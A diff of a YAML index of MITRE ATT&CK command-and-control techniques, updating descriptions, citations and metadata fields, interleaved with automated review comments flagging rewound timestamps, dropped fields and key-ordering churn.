be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
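Review bot: the T1071 description change is only the insertion of `DNS, or publishing/subscribing` plus re-wrapping, consistent with the new T1071.005 sub-technique, and the `x_mitre_version` bump to 2.3 follows in the next hunk. The trailing space inside the quoted scalar before the closing `"` (`Nov 22) "`) is carried over from the old text; harmless, but the generator could strip it.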
@@ -41116,7 +41594,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -41141,7 +41619,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -41225,7 +41702,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -41289,11 +41765,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -41377,7 +41852,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
@@ -41408,7 +41882,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -41428,8 +41902,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -41451,8 +41925,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
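Review bot: dropping `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` leaves T1572 with no attack spec version at all, whereas T1071.003 and T1092 in this same patch keep `x_mitre_attack_spec_version: 3.2.0` and lose only `spec_version`. Combined with the rewound `modified` value in the previous hunk this reads as the pre-3.x rendering of the object rather than a cleanup. T1090, T1568, T1568.003, T1104, T1205.001, T1102.003, T1102.002, T1132.002, T1001.002, T1008 and T1102.001 lose the field the same way. Either carry a 3.x `x_mitre_attack_spec_version` for these objects or explain why they are intentionally left without one.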
@@ -41514,7 +41986,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -41562,7 +42033,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -41616,7 +42086,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -41649,7 +42118,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -41669,8 +42138,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -41708,7 +42175,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -41736,42 +42203,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
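Review bot: key-ordering churn hides the real change in T1102: the platforms, domains, id, type, created and external_references keys are deleted here only to be re-added at the bottom of the object in the next hunk, so the whole block shows as rewritten when the substantive delta is small (`modified` to 2024-10-07, the description adding cloud services, Microsoft and the `(Citation: Broadcom BirdyClient Microsoft Graph API 2024)` citation, a second contributor, and `x_mitre_deprecated: false`). Pin the key order in the generator so reviewers can see the actual diff. Note also that the citation key added to the description here only resolves once the `Broadcom BirdyClient Microsoft Graph API 2024` entry in the following hunk is applied, so the two hunks must land together.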
@@ -41780,17 +42227,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
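Review bot: `x_mitre_permissions_required: - User` is dropped from T1102 here without mention, while `x_mitre_version` goes 1.1 to 1.2, `revoked: false` is added and `x_mitre_attack_spec_version` moves 2.1.0 to 3.2.0. The version bump is justified by the description change, but `x_mitre_permissions_required` is still present on T1568, T1205.001, T1102.003, T1102.002, T1132.002 and T1102.001 in this patch, so anything in the repo that filters or displays techniques by that field now treats T1102 differently from its siblings. Either call the removal out in the commit message or drop the field consistently across objects.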
@@ -41822,7 +42291,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -41839,8 +42308,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -41860,7 +42327,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -41883,8 +42350,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -41909,7 +42374,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -41934,8 +42399,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -42000,7 +42463,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -42024,7 +42486,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -42049,21 +42511,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
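Review bot: the T1090.003 description switches from the `|-` block scalar to a double-quoted scalar with `\n\n` escapes, so the only real change, the ORB-network sentence citing `(Citation: ORB Mandiant)`, is buried in a full rewrite of the paragraph; keep the block scalar style used by the surrounding descriptions. The `\ Protocols such as ICMP` line also deserves a look: the escaped leading space encodes a double space after "(WAN)." and there is a stray space before "(Citation: ORB Mandiant)". Both are harmless text quirks, but the double-quoted style is what surfaces them as escapes in the diff.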
@@ -42082,7 +42559,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -42096,6 +42573,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -42109,7 +42591,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests:
- name: Tor Proxy Usage - MacOS
@@ -42140,7 +42621,7 @@ command-and-control:
name: sh
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -42190,11 +42671,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -42203,20 +42683,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
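Review bot: this hunk only moves `x_mitre_deprecated`, `x_mitre_domains` and `x_mitre_is_subtechnique` above `x_mitre_platforms` in T1571; no value changes. Same serializer-ordering problem as T1102: fix the key order in the generator so ordering churn does not appear as content changes in every refresh.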
@@ -42241,17 +42721,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests:
- name: Testing usage of uncommonly used port
@@ -42340,7 +42819,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -42365,7 +42843,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
@@ -42402,8 +42880,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -42457,7 +42933,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -42529,33 +43004,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
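Review bot: the rename from `Protocol Impersonation` to `Protocol or Service Impersonation` is matched by the updated link text in the T1572 description earlier in this patch, so the in-file references stay consistent; anything outside this file that keys on the old technique name needs the same rename in the same change. The hunk again deletes the object's identifying keys (id, type, created, external_references) only to re-add them further down, which is the key-ordering churn already noted for T1102.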
@@ -42563,23 +43017,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
